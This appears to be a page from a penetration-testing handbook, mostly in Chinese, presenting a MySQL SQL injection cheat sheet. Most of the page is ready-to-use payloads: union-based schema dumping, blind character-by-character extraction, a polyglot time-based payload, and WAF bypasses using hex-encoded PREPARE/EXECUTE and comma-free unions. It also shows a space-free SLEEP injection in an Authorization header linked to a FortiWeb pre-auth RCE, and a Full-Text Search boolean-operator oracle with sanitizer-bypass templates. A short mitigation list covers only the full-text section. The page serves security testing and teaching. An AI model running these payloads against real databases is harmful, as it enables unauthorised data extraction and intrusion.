MySQL injection

Reading time: 12 minutes

注释

-- MYSQL Comment
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02

有趣的函数

确认 Mysql:

concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)

有用的函数

SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()

所有注入

SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

来自 https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

流程

请记住，在 "现代" 版本的 MySQL 中，你可以将 "information_schema.tables" 替换为 "mysql.innodb_table_stats" (这可能有助于绕过 WAFs).

SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges

只有 1 个值

• group_concat()
• Limit X,1

Blind one by one

• substr(version(),X,1)='r' or substring(version(),X,1)=0x70 or ascii(substr(version(),X,1))=112
• mid(version(),X,1)='5'

Blind adding

• LPAD(version(),1...lenght(version()),'1')='asd'...
• RPAD(version(),1...lenght(version()),'1')='asd'...
• SELECT RIGHT(version(),1...lenght(version()))='asd'...
• SELECT LEFT(version(),1...lenght(version()))='asd'...
• SELECT INSTR('foobarbar', 'fo...')=1

检测列数

使用一个简单的 ORDER

order by 1
order by 2
order by 3
...
order by XXX

UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...

MySQL Union Based

UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...

SSRF

在这里了解不同的选项来 abuse a Mysql injection to obtain a SSRF.

WAF 绕过技巧

通过 Prepared Statements 执行 queries

当允许 stacked queries 时，可能可以通过将要执行的 query 的 hex representation 赋值给一个变量（使用 SET），然后使用 PREPARE 和 EXECUTE MySQL 语句来最终执行该 query，从而绕过 WAFs。像下面这样：

0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #

欲了解更多信息，请参阅 这篇博文.

Information_schema 替代方案

请记住，在现代版本的 MySQL 中，你可以将 information_schema.tables 替换为 mysql.innodb_table_stats 或 sys.x$schema_flattened_keys 或 sys.schema_table_statistics

MySQLinjection 不使用逗号

在不使用任何逗号的情况下选择两列 (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):

-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#

在不知道列名的情况下检索值

如果你知道表名但不知道表中列名，可以尝试通过执行类似如下的语句来查找表中有多少列：

# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1);     # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns

假设有 2 列（第一列为 ID，第二列为 flag），你可以尝试逐字符对 flag 的内容进行 bruteforce：

# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);

More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952

Injection without SPACES (/**/ comment trick)

某些应用使用诸如 sscanf("%128s", buf) 的函数对用户输入进行清理或解析，这些函数会在第一个空格字符处停止。
由于 MySQL 将序列 /**/ 视为注释 和 空白字符，因此它可以用来在保持查询语法有效的同时，完全去除载荷中的普通空格。

示例 time-based blind injection 用来绕过空格过滤：

GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'

数据库接收到的是：

' OR SLEEP(5)-- -'

这在以下情况尤其有用：

• 可控缓冲区大小受限（例如 %128s），空格会导致输入过早结束。
• 通过 HTTP headers 或其他字段进行注入，这些字段会剥离或将普通空格用作分隔符。
• 与 INTO OUTFILE 原语结合可实现完整的 pre-auth RCE（参见 MySQL File RCE 部分）。

MySQL 历史

你可以查看 MySQL 中读取该表的其他执行：sys.x$statement_analysis

版本替代s

mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();

MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR)

这不是经典的 SQL 注入。当开发者将用户输入传给 MATCH(col) AGAINST('...' IN BOOLEAN MODE) 时，MySQL 会在引号内解析一整套布尔搜索操作符。许多 WAF/SAST 规则只关注打破引号（quote breaking），因此会忽略这一面。

Key points:

• 操作符在引号内被解析： + (must include), - (must not include), * (trailing wildcard), "..." (exact phrase), () (grouping), </>/~ (weights)。See MySQL docs.
• 这允许在不跳出字符串字面量的情况下进行存在/不存在以及前缀测试，例如 AGAINST('+admin*' IN BOOLEAN MODE) 用来检测是否存在以 admin 开头的任何词。
• 可用于构建 oracles，例如 “does any row contain a term with prefix X?” 并通过前缀扩展枚举隐藏字符串。

Example query built by the backend:

SELECT tid, firstpost
FROM threads
WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE);

If the application returns different responses depending on whether the result set is empty (e.g., redirect vs. error message), that behavior becomes a Boolean oracle that can be used to enumerate private data such as hidden/deleted titles.

Sanitizer bypass patterns (generic):

• Boundary-trim preserving wildcard: 如果后端通过类似 (\b.{1,2})(\s)|(\b.{1,2}$) 的正则对每个词修剪 1–2 个尾随字符，则提交 prefix*ZZ。清理器会修剪掉 ZZ，但保留 *，因此 prefix* 得以保留。
• Early-break stripping: 如果代码按每个词去除操作符，但在遇到任意长度 ≥ min length 的 token 时停止处理，就发送两个 token：第一个是满足长度阈值的垃圾 token，第二个携带操作符 payload。例如：&&&&& +jack*ZZ → after cleaning: +&&&&& +jack*.

Payload template (URL-encoded):

keywords=%26%26%26%26%26+%2B{FUZZ}*xD

• %26 是 &，%2B 是 +。尾随的 xD（或任何两个字母）会被 cleaner 修剪，但保留 {FUZZ}*。
• 将重定向视为 “match”，错误页面视为 “no match”。不要自动跟随重定向，以便保持 oracle 可观测。

枚举工作流程：

1. 从 {FUZZ} = a…z,0…9 开始，通过 +a*, +b*, … 找到首字母匹配。
2. 对于每个正向前缀，分支：a* → aa* / ab* / …。重复以恢复整个字符串。
3. 如果应用实行流量控制，分散请求（proxies、多个账户）。

为什么标题经常 leak 而内容不会：

• 有些应用仅在对标题/主题进行初步 MATCH 之后才应用可见性检查。如果控制流在过滤之前依赖于 “any results?” 的结果，那么会发生存在性 leak。

缓解措施：

• 如果不需要 Boolean 逻辑，使用 IN NATURAL LANGUAGE MODE，或将用户输入视为字面值（escape/quote 会在其他模式中禁用运算符）。
• 如果需要 Boolean 模式，在分词（tokenization）后对每个 token 剥离或中和所有 Boolean 运算符（+ - * " ( ) < > ~）（不要提前中断）。
• 在 MATCH 之前应用可见性/授权过滤，或在结果集为空与非空时统一响应（恒定的时延/状态）。
• 检查其他 DBMS 中的类似功能：PostgreSQL 的 to_tsquery/websearch_to_tsquery、SQL Server/Oracle/Db2 的 CONTAINS 也会解析带引号参数内部的运算符。

注意：

• Prepared statements 无法防止对 REGEXP 或搜索运算符的语义滥用。像 .* 这样的输入即使在带引号的 REGEXP '.*' 内仍然是一个宽松的正则。使用允许列表 (allow-lists) 或显式保护措施。

Other MYSQL injection guides

• PayloadsAllTheThings – MySQL Injection cheatsheet

参考资料

• PayloadsAllTheThings – MySQL Injection cheatsheet
• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)
• MySQL Full-Text Search – Boolean mode
• MySQL Full-Text Search – Overview
• MySQL REGEXP documentation
• ReDisclosure: New technique for exploiting Full-Text Search in MySQL (myBB case study)